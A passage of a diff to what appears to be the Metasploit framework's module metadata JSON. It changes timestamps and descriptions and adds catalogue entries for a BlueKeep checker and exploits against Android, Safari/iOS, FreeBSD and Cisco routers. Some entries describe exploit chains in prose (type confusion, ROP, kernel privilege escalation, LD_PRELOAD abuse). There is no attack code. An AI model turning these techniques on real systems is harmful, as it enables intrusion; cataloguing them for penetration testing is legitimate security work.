-      "CVE-2017-5612",
+      "CVE-2017-1001000",
      "WPVDB-8734",
      "URL-https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html",
      "URL-https://secure.php.net/manual/en/language.types.type-juggling.php",
@@ -27204,7 +27698,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-06-05 12:43:16 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_content_injection",
@@ -28013,7 +28507,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/yaws_traversal",
@@ -28388,7 +28882,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/jenkins/jenkins_udp_broadcast_enum",
@@ -28826,7 +29320,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/dahua_dvr_auth_bypass",
@@ -29380,7 +29874,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-11-22 08:03:12 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mongodb/mongodb_login",
@@ -29413,7 +29907,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/motorola/timbuktu_udp",
@@ -29763,7 +30257,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
@@ -30376,7 +30870,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nntp/nntp_login",
@@ -30449,7 +30943,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_nak_to_the_future",
@@ -30914,7 +31408,7 @@
    "author": [
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
-    "description": "This module dumps the usernames and password hashes\n          from Oracle given the proper Credentials and SID.\n          These are then stored as creds for later cracking.",
+    "description": "This module dumps the usernames and password hashes\n          from Oracle given the proper Credentials and SID.\n          These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.\n          This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.",
    "references": [

    ],
@@ -30928,7 +31422,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-01-25 14:07:24 +0000",
+    "mod_time": "2019-03-28 10:06:56 +0000",
    "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_hashdump",
@@ -30997,7 +31491,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-04-26 08:36:32 +0000",
    "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_brute",
@@ -31031,7 +31525,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_enum",
@@ -31106,7 +31600,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnslsnr_version",
@@ -31140,7 +31634,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnspoison_checker",
@@ -31493,7 +31987,7 @@
      "ftp"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ftpbounce",
@@ -31780,7 +32274,7 @@
    "author": [
      "Deral \"Percentx\" Heiland",
      "Pete \"Bokojan\" Arzamendi",
-      "William Vu",
+      "wvu <wvu@metasploit.com>",
      "Dev Mohanty"
    ],
    "description": "This module will extract the passwords from address books on various Canon IR-Adv mfp devices.\n        Tested models:\n        iR-ADV C2030,\n        iR-ADV 4045,\n        iR-ADV C5030,\n        iR-ADV C5235,\n        iR-ADV C5240,\n        iR-ADV 6055,\n        iR-ADV C7065",
@@ -31806,7 +32300,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-22 17:01:49 +0000",
    "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/canon_iradv_pwd_extract",
@@ -31917,7 +32411,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_env_vars",
@@ -31991,7 +32485,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 21:02:39 +0000",
    "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_volumes",
@@ -32145,6 +32639,47 @@
    "notes": {
    }
  },
+  "auxiliary_scanner/rdp/cve_2019_0708_bluekeep": {
+    "name": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check",
+    "full_name": "auxiliary/scanner/rdp/cve_2019_0708_bluekeep",
+    "rank": 300,
+    "disclosure_date": "2019-05-14",
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "zerosum0x0"
+    ],
+    "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n        by binding the MS_T120 channel outside of its normal slot and sending\n        non-DoS packets which respond differently on patched and vulnerable hosts.",
+    "references": [
+      "CVE-2019-0708",
+      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-05-24 11:23:25 +0000",
+    "path": "/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/rdp/cve_2019_0708_bluekeep",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "AKA": [
+        "BlueKeep"
+      ]
+    }
+  },
  "auxiliary_scanner/rdp/ms12_020_check": {
    "name": "MS12-020 Microsoft Remote Desktop Checker",
    "full_name": "auxiliary/scanner/rdp/ms12_020_check",
@@ -32192,7 +32727,7 @@
    "author": [
      "Jon Hart <jon_hart@rapid7.com>"
    ],
-    "description": "This module attempts to connect to the specified Remote Desktop Protocol port\n          and determines if it speaks RDP.",
+    "description": "This module attempts to connect to the specified Remote Desktop Protocol port\n          and determines if it speaks RDP.\n\n          The CredSSP and EarlyUser options are related to Network Level Authentication.",
    "references": [
      "URL-https://msdn.microsoft.com/en-us/library/cc240445.aspx"
    ],
@@ -32206,7 +32741,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-09 21:32:15 +0000",
+    "mod_time": "2019-05-24 17:30:33 +0000",
    "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/rdp_scanner",
@@ -32342,7 +32877,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/rogue/rogue_recv.rb",
    "is_install_path": true,
    "ref_name": "scanner/rogue/rogue_recv",
@@ -32732,7 +33267,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
@@ -32818,7 +33353,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
@@ -32861,7 +33396,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
@@ -32904,7 +33439,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getenv",
@@ -32948,7 +33483,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
@@ -32992,7 +33527,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
@@ -33035,7 +33570,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
@@ -33078,7 +33613,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
@@ -33122,7 +33657,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-19 18:16:26 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
@@ -33165,7 +33700,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
@@ -33208,7 +33743,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
@@ -33251,7 +33786,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_version",
@@ -34232,7 +34767,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
@@ -34836,7 +35371,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-03-22 06:41:58 +0000",
+    "mod_time": "2019-05-22 13:00:09 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
@@ -34871,7 +35406,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_dcerpc_auditor",
@@ -34909,7 +35444,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/psexec_loggedin_users",
@@ -35053,7 +35588,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-09-11 19:05:26 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -35088,7 +35623,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -35124,7 +35659,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers_domain",
@@ -35162,7 +35697,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-11-05 17:49:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -35197,7 +35732,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-10-20 15:32:25 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_lookupsid.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_lookupsid",
@@ -35242,7 +35777,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-08-27 13:11:22 +0000",
+    "mod_time": "2019-05-23 14:19:33 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_ms17_010.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_ms17_010",
@@ -35287,7 +35822,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_uninit_cred.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_uninit_cred",
@@ -35635,9 +36170,10 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "pello <fropert@packetfault.org>"
+      "pello <fropert@packetfault.org>",
+      "ct5595"
    ],
-    "description": "This module will copy file to a Cisco IOS device using SNMP and TFTP.\n        A read-write SNMP community is required. The SNMP community scanner module can\n        assist in identifying a read-write community. The target must\n        be able to connect back to the Metasploit system and the use of\n        NAT will cause the TFTP transfer to fail.",
+    "description": "This module will copy file to a Cisco IOS device using SNMP and TFTP.\n        The action Override_Config will override the running config of the Cisco device.\n        A read-write SNMP community is required. The SNMP community scanner module can\n        assist in identifying a read-write community. The target must\n        be able to connect back to the Metasploit system and the use of\n        NAT will cause the TFTP transfer to fail.",
    "references": [

    ],
@@ -35651,7 +36187,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-09 09:01:33 +0000",
    "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_upload_file",
@@ -36344,7 +36880,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 15:36:32 +0000",
+    "mod_time": "2019-03-05 17:21:11 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -36490,7 +37026,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:38:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -36941,7 +37477,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:38:58 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
@@ -38169,7 +38705,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-28 15:03:04 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -38908,7 +39444,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-11-17 21:17:12 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/server/capture/printjob_capture.rb",
    "is_install_path": true,
    "ref_name": "server/capture/printjob_capture",
@@ -39929,7 +40465,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-06-04 15:27:20 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/sniffer/psnuffle.rb",
    "is_install_path": true,
    "ref_name": "sniffer/psnuffle",
@@ -41052,7 +41588,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/voip/sip_deregister.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_deregister",
@@ -41086,7 +41622,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_invite_spoof",
@@ -43116,6 +43652,45 @@
    "notes": {
    }
  },
+  "exploit_android/local/su_exec": {
+    "name": "Android 'su' Privilege Escalation",
+    "full_name": "exploit/android/local/su_exec",
+    "rank": 0,
+    "disclosure_date": "2017-08-31",
+    "type": "exploit",
+    "author": [
+      "timwr"
+    ],
+    "description": "This module uses the su binary present on rooted devices to run\n          a payload as root.\n\n          A rooted Android device will contain a su binary (often linked with\n          an application) that allows the user to run commands as root.\n          This module will use the su binary to execute a command stager\n          as root. The command stager will write a payload binary to a\n          temporary directory, make it executable, execute it in the background,\n          and finally delete the executable.\n\n          On most devices the su binary will pop-up a prompt on the device\n          asking the user for permission.",
+    "references": [
+
+    ],
+    "platform": "Android,Linux",
+    "arch": "aarch64, armle, x86, x64, mipsle",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "aarch64",
+      "armle",
+      "x86",
+      "x64",
+      "mipsle"
+    ],
+    "mod_time": "2019-03-29 10:44:58 +0000",
+    "path": "/modules/exploits/android/local/su_exec.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/su_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_apple_ios/browser/safari_libtiff": {
    "name": "Apple iOS MobileSafari LibTIFF Buffer Overflow",
    "full_name": "exploit/apple_ios/browser/safari_libtiff",
@@ -43154,6 +43729,49 @@
    "notes": {
    }
  },
+  "exploit_apple_ios/browser/webkit_createthis": {
+    "name": "Safari Webkit Proxy Object Type Confusion",
+    "full_name": "exploit/apple_ios/browser/webkit_createthis",
+    "rank": 0,
+    "disclosure_date": "2018-03-15",
+    "type": "exploit",
+    "author": [
+      "saelo",
+      "niklasb",
+      "Ian Beer",
+      "siguza"
+    ],
+    "description": "This module exploits a type confusion bug in the Javascript Proxy object in\n        WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n        it is possible to run arbitrary JS code during the execution of a CreateThis\n        operation. This makes it possible to change the structure of e.g. an argument\n        without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n          The type confusion leads to the ability to allocate fake Javascript objects,\n        as well as the ability to find the address in memory of a Javascript object.\n        This allows us to construct a fake JSCell object that can be used to read\n        and write arbitrary memory from Javascript.  The module then uses a ROP chain\n        to write the first stage shellcode into executable memory within the Safari\n        process and kick off its execution.\n\n          The first stage maps the second stage macho (containing CVE-2017-13861) into\n        executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n        exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n        kernel memory. The processes credential and sandbox structure in the kernel\n        is overwritten and the meterpreter payloads code signature hash is added to\n        the kernels trust cache, allowing Safari to load and execute the (self-signed)\n        meterpreter payload.",
+    "references": [
+      "CVE-2018-4233",
+      "CVE-2017-13861",
+      "URL-https://github.com/saelo/cve-2018-4233",
+      "URL-https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1417",
+      "URL-https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js"
+    ],
+    "platform": "Apple_iOS",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-21 15:46:47 +0000",
+    "path": "/modules/exploits/apple_ios/browser/webkit_createthis.rb",
+    "is_install_path": true,
+    "ref_name": "apple_ios/browser/webkit_createthis",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_apple_ios/browser/webkit_trident": {
    "name": "WebKit not_number defineProperties UAF",
    "full_name": "exploit/apple_ios/browser/webkit_trident",
@@ -43196,7 +43814,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-10-16 14:59:27 +0000",
+    "mod_time": "2019-04-21 14:26:53 +0000",
    "path": "/modules/exploits/apple_ios/browser/webkit_trident.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/browser/webkit_trident",
@@ -43533,6 +44151,53 @@
    "notes": {
    }
  },
+  "exploit_freebsd/local/intel_sysret_priv_esc": {
+    "name": "FreeBSD Intel SYSRET Privilege Escalation",
+    "full_name": "exploit/freebsd/local/intel_sysret_priv_esc",
+    "rank": 500,
+    "disclosure_date": "2012-06-12",
+    "type": "exploit",
+    "author": [
+      "Rafal Wojtczuk",
+      "John Baldwin",
+      "iZsh",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the FreeBSD kernel,\n        when running on 64-bit Intel processors.\n\n        By design, 64-bit processors following the X86-64 specification will\n        trigger a general protection fault (GPF) when executing a SYSRET\n        instruction with a non-canonical address in the RCX register.\n\n        However, Intel processors check for a non-canonical address prior to\n        dropping privileges, causing a GPF in privileged mode. As a result,\n        the current userland RSP stack pointer is restored and executed,\n        resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        FreeBSD 8.3-RELEASE (amd64); and\n        FreeBSD 9.0-RELEASE (amd64).",
+    "references": [
+      "BID-53856",
+      "CVE-2012-0217",
+      "EDB-28718",
+      "PACKETSTORM-113584",
+      "URL-https://www.freebsd.org/security/patches/SA-12:04/sysret.patch",
+      "URL-https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/",
+      "URL-https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c",
+      "URL-https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/",
+      "URL-http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc",
+      "URL-https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation"
+    ],
+    "platform": "BSD",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2018-12-21 15:40:01 +0000",
+    "path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/local/intel_sysret_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_freebsd/local/mmap": {
    "name": "FreeBSD 9 Address Space Manipulation Privilege Escalation",
    "full_name": "exploit/freebsd/local/mmap",
@@ -43575,6 +44240,51 @@
    "notes": {
    }
  },
+  "exploit_freebsd/local/rtld_execl_priv_esc": {
+    "name": "FreeBSD rtld execl() Privilege Escalation",
+    "full_name": "exploit/freebsd/local/rtld_execl_priv_esc",
+    "rank": 600,
+    "disclosure_date": "2009-11-30",
+    "type": "exploit",
+    "author": [
+      "Kingcope",
+      "stealth",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits a vulnerability in the FreeBSD\n        run-time link-editor (rtld).\n\n        The rtld `unsetenv()` function fails to remove `LD_*`\n        environment variables if `__findenv()` fails.\n\n        This can be abused to load arbitrary shared objects using\n        `LD_PRELOAD`, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        FreeBSD 7.2-RELEASE (amd64); and\n        FreeBSD 8.0-RELEASE (amd64).",
+    "references": [
+      "BID-37154",
+      "CVE-2009-4146",
+      "CVE-2009-4147",
+      "SOUNDTRACK-https://www.youtube.com/watch?v=dDnhthI27Fg",
+      "URL-https://seclists.org/fulldisclosure/2009/Nov/371",
+      "URL-https://c-skills.blogspot.com/2009/11/always-check-return-value.html",
+      "URL-https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html",
+      "URL-https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/",
+      "URL-https://securitytracker.com/id/1023250"
+    ],
+    "platform": "BSD",
+    "arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-05-03 09:53:37 +0000",
+    "path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/local/rtld_execl_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_freebsd/local/watchguard_fix_corrupt_mail": {
    "name": "Watchguard XCS FixCorruptMail Local Privilege Escalation",
    "full_name": "exploit/freebsd/local/watchguard_fix_corrupt_mail",
@@ -44920,6 +45630,110 @@
    "notes": {
    }
  },
+  "exploit_linux/http/cisco_rv130_rmi_rce": {
+    "name": "Cisco RV130W Routers Management Interface Remote Command Execution",
+    "full_name": "exploit/linux/http/cisco_rv130_rmi_rce",
+    "rank": 400,
+    "disclosure_date": "2019-02-27",
+    "type": "exploit",
+    "author": [
+      "Yu Zhang",
+      "Haoliang Lu",
+      "T. Shiomitsu",
+      "Quentin Kaiser <kaiserquentin@gmail.com>"
+    ],
